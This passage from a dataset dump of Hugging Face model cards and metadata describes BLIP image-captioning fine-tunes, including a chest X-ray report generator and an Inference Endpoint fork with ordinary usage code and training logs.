bsd-3-clause\npipeline_tag: image-to-text\ntags:\n- image-captioning\nlanguages:\n- en"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""639861ac02d4b462c93d29f5"", ""modelId"": ""Salesforce/blip-image-captioning-large"", ""usedStorage"": 7519815588}",0,"https://huggingface.co/adibvafa/BLIP-MIMIC-CXR, https://huggingface.co/pimcore/IEP__image-capturing-large, https://huggingface.co/shyamgv/blip-image-captioning-large-shyam, https://huggingface.co/welcometoFightclub/llmachatbot, https://huggingface.co/Jakapong/jakudon, https://huggingface.co/rcfg/FashionBLIP-1, https://huggingface.co/manh08/blip-model, https://huggingface.co/saakshigupta/blip-finetuned-gradcam, https://huggingface.co/saakshigupta/blip-finetuned-gradcam-optimized, https://huggingface.co/saakshigupta/deepfake-blip-large",10,,0,,0,,0,"Claudz163/Image-To-Character-Text, JournalistsonHF/text-to-image-bias, LuckRafly/Chat-with-an-Image-GeminiAI, fffiloni/text-guided-image-colorization, hysts/image-captioning-with-blip, matanmichaely/image_to_audio_story, openfree/ColorRevive, radames/Candle-BLIP-Image-Captioning, resul-ai/comparing-captioning-models, sam-hq-team/sam-hq, 
tonyassi/blip-image-captioning-large, xingpng/CSGO",12
|
| 153 |
+
adibvafa/BLIP-MIMIC-CXR,"---
|
| 154 |
+
library_name: transformers
|
| 155 |
+
tags:
|
| 156 |
+
- Radiology
|
| 157 |
+
- BLIP
|
| 158 |
+
- MIMIC-CXR
|
| 159 |
+
- Healthcare
|
| 160 |
+
- X-Ray
|
| 161 |
+
- PyTorch
|
| 162 |
+
license: apache-2.0
|
| 163 |
+
base_model:
|
| 164 |
+
- Salesforce/blip-image-captioning-large
|
| 165 |
+
pipeline_tag: image-text-to-text
|
| 166 |
+
---
|
| 167 |
+
|
| 168 |
+
# RadioCare
|
| 169 |
+

|
| 170 |
+
|
| 171 |
+
**PLEASE REQUEST ACCESS WITH PROOF OF YOUR MIMIC-CXR ACCESS RIGHTS TO BE APPROVED**
|
| 172 |
+
|
| 173 |
+
## About
|
| 174 |
+
This is the model checkpoint for BLIP (""Salesforce/blip-image-captioning-large"") finetuned on the MIMIC-CXR dataset; given a chest X-ray and a clinical indication (e.g. 'eval for pneumonia'), it generates accurate radiology reports.
|
| 175 |
+
Training and inference code is provided in the [GitHub repository](https://github.com/Adibvafa/RadioCareBorealisAI).
|
| 176 |
+
<br><br>
|
| 177 |
+
|
| 178 |
+
## Code
|
| 179 |
+
```python
|
| 180 |
+
from PIL import Image
|
| 181 |
+
from transformers import BlipForConditionalGeneration, BlipProcessor
|
| 182 |
+
|
| 183 |
+
# Load model
|
| 184 |
+
processor = BlipProcessor.from_pretrained(""adibvafa/BLIP-MIMIC-CXR"")
|
| 185 |
+
model = BlipForConditionalGeneration.from_pretrained(""adibvafa/BLIP-MIMIC-CXR"")
|
| 186 |
+
|
| 187 |
+
# Load data
|
| 188 |
+
image = 'chest-x-ray.jpg'
|
| 189 |
+
prompt = 'final report\nexamination: chest (pa and lat)\nindication: ___f with chest pressure, uri sx, voice change.'
|
| 190 |
+
|
| 191 |
+
# Process inputs
|
| 192 |
+
inputs = processor(
|
| 193 |
+
images=Image.open(image),
|
| 194 |
+
text=prompt,
|
| 195 |
+
return_tensors=""pt""
|
| 196 |
+
)
|
| 197 |
+
|
| 198 |
+
# Generate radiology report
|
| 199 |
+
output = model.generate(**inputs, max_length=512)
|
| 200 |
+
report = processor.decode(output[0], skip_special_tokens=True)
|
| 201 |
+
```
|
| 202 |
+
|
| 203 |
+
```
|
| 204 |
+
### the generated report will look like the following:
|
| 205 |
+
final report
|
| 206 |
+
examination : chest ( pa and lat )
|
| 207 |
+
indication : ___f with chest pressure, uri sx, voice change.
|
| 208 |
+
comparison : none
|
| 209 |
+
findings : pa and lateral views of the chest provided. there is no focal consolidation, effusion, or pneumothorax. the cardiomediastinal silhouette is normal. imaged osseous structures are intact. no free air below the right hemidiaphragm is seen.
|
| 210 |
+
impression : no acute intrathoracic process.
|
| 211 |
+
```
|
| 212 |
+
<br>
|
| 213 |
+
|
| 214 |
+
## Demo
|
| 215 |
+

|
| 216 |
+
<br>
|
| 217 |
+
|
| 218 |
+
## Introduction
|
| 219 |
+
Radiocare aims to develop a cutting-edge image-to-text model that generates accurate radiology reports and diagnoses for chest X-ray images. By leveraging the BLIP and Vision Transformer architectures, Radiocare seeks to streamline the diagnostic process, enabling faster and more accurate identification of health issues. This project addresses the critical need for timely and precise radiological assessments, especially in rural areas with limited access to healthcare. Ultimately, Radiocare strives to improve patient outcomes and bridge the gap in healthcare accessibility across Canada.
|
| 220 |
+
<br><br>
|
| 221 |
+
|
| 222 |
+
## Methods
|
| 223 |
+
|
| 224 |
+
### Data
|
| 225 |
+
Radiocare utilizes data from the MIMIC-CXR database on PhysioNet, consisting of a large collection of chest X-ray images and associated radiology reports. This dataset provides a comprehensive source of medical images essential for training and evaluating the model.
|
| 226 |
+
<br><br>
|
| 227 |
+
|
| 228 |
+
### Model Architecture
|
| 229 |
+
Radiocare employs the BLIP (Bootstrapped Language-Image Pre-training) model, which integrates the Vision Transformer (ViT) architecture with a text decoder. ViT processes images by dividing them into fixed-size patches, transforming these patches into high-dimensional vectors, and then embedding them into tokens. The self-attention mechanism in ViT captures global dependencies across patches, enhancing the model's understanding of the entire image. The text decoder translates these visual features into coherent radiology reports, enabling detailed and accurate diagnostics.
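
As an aside, here is a minimal PyTorch sketch of the patch-embedding step described above; the dimensions are illustrative assumptions, not BLIP's exact configuration.

```python
# Minimal ViT-style patch embedding; sizes are illustrative, not BLIP's exact config.
import torch
import torch.nn as nn

patch_embed = nn.Conv2d(3, 768, kernel_size=16, stride=16)  # one 16x16 patch -> one 768-d token
image = torch.randn(1, 3, 384, 384)                         # a single RGB image
tokens = patch_embed(image).flatten(2).transpose(1, 2)      # shape: (1, 576, 768) patch tokens
```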
|
| 230 |
+
<br><br>
|
| 231 |
+
|
| 232 |
+
## Results
|
| 233 |
+
Radiocare's model can assess a chest X-ray in approximately 3 seconds, providing doctors with a 99% faster diagnostic process. Key performance metrics include:
|
| 234 |
+
|
| 235 |
+
- **BERTScore**: 47.2
|
| 236 |
+
- **RadGraph**: 26.1
|
| 237 |
+
<br><br>
|
| 238 |
+
|
| 239 |
+
## Discussion
|
| 240 |
+
Radiocare represents a significant advancement in the field of medical diagnostics by leveraging state-of-the-art AI techniques to generate accurate and timely radiology reports from chest X-ray images. The integration of the BLIP model and Vision Transformer architecture enhances the diagnostic process, ensuring faster and more reliable results. By addressing the critical healthcare needs, especially in underserved rural areas, Radiocare has the potential to improve patient outcomes and bridge the gap in healthcare accessibility across Canada.
|
| 241 |
+
<br><br>
|
| 242 |
+
|
| 243 |
+
## Team Information
|
| 244 |
+
Radiocare is part of the Spring 2024 cohort of Borealis AI's ""Let's SOLVE It"" program. The project team includes:
|
| 245 |
+
- [Adibvafa Fallahpour](https://adibvafa.github.io/Portfolio/)
|
| 246 |
+
- [Archita Srivastava](https://www.linkedin.com/in/archita7/)
|
| 247 |
+
- [Mantaj Dhillon](https://www.linkedin.com/in/mantaj-dhillon/)
|
| 248 |
+
- [Grace Liu](https://www.linkedin.com/in/gracelliu/)
|
| 249 |
+
<br><br>
|
| 250 |
+
|
| 251 |
+
## Repository Structure
|
| 252 |
+
The repository is organized as follows:
|
| 253 |
+
- **data_modules/**: Contains data loading and preprocessing scripts.
|
| 254 |
+
- **evals/**: Includes evaluation scripts and metrics calculation.
|
| 255 |
+
- **models/**: Contains the different model architectures.
|
| 256 |
+
- **blip/**: Final model implementation using BLIP and ViT.
|
| 257 |
+
- **cnn/**: Convolutional neural network models.
|
| 258 |
+
- **vit/**: Vision Transformer models.
|
| 259 |
+
- **utils/**: Utility functions for the project.
|
| 260 |
+
- **slurm/**: SLURM batch scripts for running jobs on a computing cluster.
|
| 261 |
+
<br><br>
|
| 262 |
+
|
| 263 |
+
## Citation
|
| 264 |
+
|
| 265 |
+
If you use this work in your research, please cite:
|
| 266 |
+
|
| 267 |
+
```
|
| 268 |
+
@misc {adibvafa_fallahpour_2024,
|
| 269 |
+
author = { Fallahpour, Adibvafa and Srivastava, Archita and Dhillon, Mantaj and Liu, Grace },
|
| 270 |
+
title = { BLIP-MIMIC-CXR },
|
| 271 |
+
year = 2024,
|
| 272 |
+
url = { https://huggingface.co/adibvafa/BLIP-MIMIC-CXR },
|
| 273 |
+
doi = { 10.57967/hf/3207 },
|
| 274 |
+
publisher = { Hugging Face }
|
| 275 |
+
}
|
| 276 |
+
```","{""id"": ""adibvafa/BLIP-MIMIC-CXR"", ""author"": ""adibvafa"", ""sha"": ""68bbaafa089a4ca4fa25653cc77cbedbbda1c7fa"", ""last_modified"": ""2025-01-11 03:28:52+00:00"", ""created_at"": ""2024-10-08 16:20:34+00:00"", ""private"": false, ""gated"": ""auto"", ""disabled"": false, ""downloads"": 55, ""downloads_all_time"": null, ""likes"": 6, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""Radiology"", ""BLIP"", ""MIMIC-CXR"", ""Healthcare"", ""X-Ray"", ""PyTorch"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""doi:10.57967/hf/3207"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- Radiology\n- BLIP\n- MIMIC-CXR\n- Healthcare\n- X-Ray\n- PyTorch"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-11 03:28:52+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- Radiology\n- BLIP\n- MIMIC-CXR\n- Healthcare\n- X-Ray\n- PyTorch"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67055bd22ca275d090a3e2b2"", ""modelId"": ""adibvafa/BLIP-MIMIC-CXR"", ""usedStorage"": 
1879010480}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=adibvafa/BLIP-MIMIC-CXR&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Badibvafa%2FBLIP-MIMIC-CXR%5D(%2Fadibvafa%2FBLIP-MIMIC-CXR)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 277 |
+
pimcore/IEP__image-capturing-large,"---
|
| 278 |
+
tags:
|
| 279 |
+
- vision
|
| 280 |
+
- image-to-text
|
| 281 |
+
- endpoints-template
|
| 282 |
+
inference: false
|
| 283 |
+
pipeline_tag: image-to-text
|
| 284 |
+
base_model: Salesforce/blip-image-captioning-large
|
| 285 |
+
library_name: generic
|
| 286 |
+
---
|
| 287 |
+
|
| 288 |
+
# Fork of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) for an `image-to-text` Inference Endpoint.
|
| 289 |
+
|
| 290 |
+
> Inspired by https://huggingface.co/sergeipetrov/blip_captioning
|
| 291 |
+
|
| 292 |
+
This repository implements a `custom` task for `image-to-text` for 🤗 Inference Endpoints to allow image captioning.
|
| 293 |
+
The code for the customized pipeline is in `handler.py`.
|
| 294 |
+
|
| 295 |
+
To deploy this model to an Inference Endpoint, you have to select `Custom` as the task so that the `handler.py` file is used.
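
For orientation, a minimal sketch of what such a `handler.py` could look like; the actual file in this repo may differ, and the class below follows the general Inference Endpoints custom-handler convention.

```python
# Hypothetical minimal handler.py sketch (the repo's actual handler may differ).
import io
from PIL import Image
from transformers import BlipForConditionalGeneration, BlipProcessor

class EndpointHandler:
    def __init__(self, path=''):
        # 'path' points at the repository checkout inside the endpoint container
        self.processor = BlipProcessor.from_pretrained(path)
        self.model = BlipForConditionalGeneration.from_pretrained(path)

    def __call__(self, data):
        # binary payloads arrive under the 'inputs' key
        image = Image.open(io.BytesIO(data['inputs'])).convert('RGB')
        inputs = self.processor(image, return_tensors='pt')
        out = self.model.generate(**inputs)
        return {'caption': self.processor.decode(out[0], skip_special_tokens=True)}
```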
|
| 296 |
+
|
| 297 |
+
### Expected request payload
|
| 298 |
+
|
| 299 |
+
The image to be captioned, sent as binary data.
|
| 300 |
+
|
| 301 |
+
#### CURL
|
| 302 |
+
|
| 303 |
+
```
|
| 304 |
+
curl URL \
|
| 305 |
+
-X POST \
|
| 306 |
+
--data-binary @car.png \
|
| 307 |
+
-H ""Content-Type: image/png""
|
| 308 |
+
```
|
| 309 |
+
|
| 310 |
+
#### Python
|
| 311 |
+
|
| 312 |
+
```python
|
| 313 |
+
import requests

ENDPOINT_URL = ""https://<your-endpoint>""  # placeholder: your deployed endpoint URL
requests.post(ENDPOINT_URL, headers={""Content-Type"": ""image/png""}, data=open(""car.png"", 'rb').read()).json()
|
| 314 |
+
```","{""id"": ""pimcore/IEP__image-capturing-large"", ""author"": ""pimcore"", ""sha"": ""83bfe0f7c930802cc834f71d80efef789903fd12"", ""last_modified"": ""2024-02-07 15:53:53+00:00"", ""created_at"": ""2024-02-07 15:52:17+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""generic"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""generic"", ""vision"", ""image-to-text"", ""endpoints-template"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: generic\npipeline_tag: image-to-text\ntags:\n- vision\n- image-to-text\n- endpoints-template\ninference: false"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='.gitignore', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='handler.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-02-07 15:53:53+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: generic\npipeline_tag: image-to-text\ntags:\n- vision\n- image-to-text\n- endpoints-template\ninference: false"", ""transformersInfo"": null, ""_id"": ""65c3a7319596b0b3b84a92b0"", ""modelId"": ""pimcore/IEP__image-capturing-large"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=pimcore/IEP__image-capturing-large&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bpimcore%2FIEP__image-capturing-large%5D(%2Fpimcore%2FIEP__image-capturing-large)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 315 |
+
shyamgv/blip-image-captioning-large-shyam,"---
|
| 316 |
+
library_name: transformers
|
| 317 |
+
license: bsd-3-clause
|
| 318 |
+
base_model: Salesforce/blip-image-captioning-large
|
| 319 |
+
tags:
|
| 320 |
+
- generated_from_trainer
|
| 321 |
+
datasets:
|
| 322 |
+
- imagefolder
|
| 323 |
+
model-index:
|
| 324 |
+
- name: blip-image-captioning-large-shyam
|
| 325 |
+
results: []
|
| 326 |
+
---
|
| 327 |
+
|
| 328 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 329 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 330 |
+
|
| 331 |
+
# blip-image-captioning-large-shyam
|
| 332 |
+
|
| 333 |
+
This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on the imagefolder dataset.
|
| 334 |
+
It achieves the following results on the evaluation set:
|
| 335 |
+
- Loss: 0.2169
|
| 336 |
+
- Wer Score: 0.9091
|
| 337 |
+
|
| 338 |
+
## Model description
|
| 339 |
+
|
| 340 |
+
More information needed
|
| 341 |
+
|
| 342 |
+
## Intended uses & limitations
|
| 343 |
+
|
| 344 |
+
More information needed
|
| 345 |
+
|
| 346 |
+
## Training and evaluation data
|
| 347 |
+
|
| 348 |
+
More information needed
|
| 349 |
+
|
| 350 |
+
## Training procedure
|
| 351 |
+
|
| 352 |
+
### Training hyperparameters
|
| 353 |
+
|
| 354 |
+
The following hyperparameters were used during training (see the sketch after this list):
|
| 355 |
+
- learning_rate: 5e-05
|
| 356 |
+
- train_batch_size: 2
|
| 357 |
+
- eval_batch_size: 2
|
| 358 |
+
- seed: 42
|
| 359 |
+
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
|
| 360 |
+
- lr_scheduler_type: linear
|
| 361 |
+
- num_epochs: 15
|
| 362 |
+
- mixed_precision_training: Native AMP
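
A hedged `TrainingArguments` sketch matching the listed values; the output directory is an assumption, since the card does not show the actual Trainer setup.

```python
# Sketch only: TrainingArguments mirroring the hyperparameters listed above.
from transformers import TrainingArguments

args = TrainingArguments(
    output_dir='blip-image-captioning-large-shyam',  # assumed
    learning_rate=5e-5,
    per_device_train_batch_size=2,
    per_device_eval_batch_size=2,
    seed=42,
    lr_scheduler_type='linear',
    num_train_epochs=15,
    fp16=True,  # 'Native AMP' mixed precision
)
```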
|
| 363 |
+
|
| 364 |
+
### Training results
|
| 365 |
+
|
| 366 |
+
| Training Loss | Epoch | Step | Validation Loss | Wer Score |
|
| 367 |
+
|:-------------:|:-----:|:----:|:---------------:|:---------:|
|
| 368 |
+
| 6.7457 | 5.0 | 50 | 3.7819 | 0.9091 |
|
| 369 |
+
| 1.9042 | 10.0 | 100 | 0.6590 | 0.9091 |
|
| 370 |
+
| 0.3114 | 15.0 | 150 | 0.2169 | 0.9091 |
|
| 371 |
+
|
| 372 |
+
|
| 373 |
+
### Framework versions
|
| 374 |
+
|
| 375 |
+
- Transformers 4.44.2
|
| 376 |
+
- Pytorch 2.4.1+cu121
|
| 377 |
+
- Datasets 3.0.1
|
| 378 |
+
- Tokenizers 0.19.1
|
| 379 |
+
","{""id"": ""shyamgv/blip-image-captioning-large-shyam"", ""author"": ""shyamgv"", ""sha"": ""958a0374add78913e6ecce580b0b971aa7d806a3"", ""last_modified"": ""2024-10-03 14:11:15+00:00"", ""created_at"": ""2024-09-30 14:42:23+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""dataset:imagefolder"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-image-captioning-large-shyam"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip""}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct01_18-23-28_8f759df9fa64/events.out.tfevents.1727807009.8f759df9fa64.368.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct01_20-35-32_3338b107fa91/events.out.tfevents.1727814934.3338b107fa91.506.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct02_22-05-24_7dfcaf8596c2/events.out.tfevents.1727906747.7dfcaf8596c2.275.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct03_13-54-36_fd3d0fddb05e/events.out.tfevents.1727963690.fd3d0fddb05e.1650.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-03 14:11:15+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""66fab8cf0369576de8e0bf08"", ""modelId"": ""shyamgv/blip-image-captioning-large-shyam"", ""usedStorage"": 
16911185228}",1,https://huggingface.co/shyamgv/blip-image-captioning-large-shyam-shyam,1,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=shyamgv/blip-image-captioning-large-shyam&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bshyamgv%2Fblip-image-captioning-large-shyam%5D(%2Fshyamgv%2Fblip-image-captioning-large-shyam)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 380 |
+
shyamgv/blip-image-captioning-large-shyam-shyam,"---
|
| 381 |
+
library_name: transformers
|
| 382 |
+
license: bsd-3-clause
|
| 383 |
+
base_model: shyamgv/blip-image-captioning-large-shyam
|
| 384 |
+
tags:
|
| 385 |
+
- generated_from_trainer
|
| 386 |
+
datasets:
|
| 387 |
+
- imagefolder
|
| 388 |
+
model-index:
|
| 389 |
+
- name: blip-image-captioning-large-shyam-shyam
|
| 390 |
+
results: []
|
| 391 |
+
---
|
| 392 |
+
|
| 393 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 394 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 395 |
+
|
| 396 |
+
# blip-image-captioning-large-shyam-shyam
|
| 397 |
+
|
| 398 |
+
This model is a fine-tuned version of [shyamgv/blip-image-captioning-large-shyam](https://huggingface.co/shyamgv/blip-image-captioning-large-shyam) on the imagefolder dataset.
|
| 399 |
+
It achieves the following results on the evaluation set:
|
| 400 |
+
- Loss: 0.0044
|
| 401 |
+
- Wer Score: 0.1111
|
| 402 |
+
|
| 403 |
+
## Model description
|
| 404 |
+
|
| 405 |
+
More information needed
|
| 406 |
+
|
| 407 |
+
## Intended uses & limitations
|
| 408 |
+
|
| 409 |
+
More information needed
|
| 410 |
+
|
| 411 |
+
## Training and evaluation data
|
| 412 |
+
|
| 413 |
+
More information needed
|
| 414 |
+
|
| 415 |
+
## Training procedure
|
| 416 |
+
|
| 417 |
+
### Training hyperparameters
|
| 418 |
+
|
| 419 |
+
The following hyperparameters were used during training:
|
| 420 |
+
- learning_rate: 5e-05
|
| 421 |
+
- train_batch_size: 2
|
| 422 |
+
- eval_batch_size: 2
|
| 423 |
+
- seed: 42
|
| 424 |
+
- optimizer: AdamW (adamw_torch) with betas=(0.9,0.999), epsilon=1e-08, and no additional optimizer arguments
|
| 425 |
+
- lr_scheduler_type: linear
|
| 426 |
+
- num_epochs: 15
|
| 427 |
+
- mixed_precision_training: Native AMP
|
| 428 |
+
|
| 429 |
+
### Training results
|
| 430 |
+
|
| 431 |
+
| Training Loss | Epoch | Step | Validation Loss | Wer Score |
|
| 432 |
+
|:-------------:|:-------:|:----:|:---------------:|:---------:|
|
| 433 |
+
| 0.0104 | 2.9412 | 50 | 0.0041 | 0.1111 |
|
| 434 |
+
| 0.0025 | 5.8824 | 100 | 0.0049 | 0.1111 |
|
| 435 |
+
| 0.0003 | 8.8235 | 150 | 0.0056 | 0.1667 |
|
| 436 |
+
| 0.0002 | 11.7647 | 200 | 0.0045 | 0.1111 |
|
| 437 |
+
| 0.0001 | 14.7059 | 250 | 0.0044 | 0.1111 |
|
| 438 |
+
|
| 439 |
+
|
| 440 |
+
### Framework versions
|
| 441 |
+
|
| 442 |
+
- Transformers 4.46.0.dev0
|
| 443 |
+
- Pytorch 2.4.1+cu121
|
| 444 |
+
- Datasets 3.0.1
|
| 445 |
+
- Tokenizers 0.20.0
|
| 446 |
+
","{""id"": ""shyamgv/blip-image-captioning-large-shyam-shyam"", ""author"": ""shyamgv"", ""sha"": ""0c61d2794e1d3c5cb7545502816e2e27208d647b"", ""last_modified"": ""2024-10-02 16:00:01+00:00"", ""created_at"": ""2024-10-02 15:40:34+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""dataset:imagefolder"", ""base_model:shyamgv/blip-image-captioning-large-shyam"", ""base_model:finetune:shyamgv/blip-image-captioning-large-shyam"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: shyamgv/blip-image-captioning-large-shyam\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam-shyam\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-image-captioning-large-shyam-shyam"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip""}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct02_15-40-33_08293887d125/events.out.tfevents.1727883635.08293887d125.537.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-02 16:00:01+00:00"", ""cardData"": ""base_model: shyamgv/blip-image-captioning-large-shyam\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam-shyam\n results: []"", ""transformersInfo"": {""auto_model"": 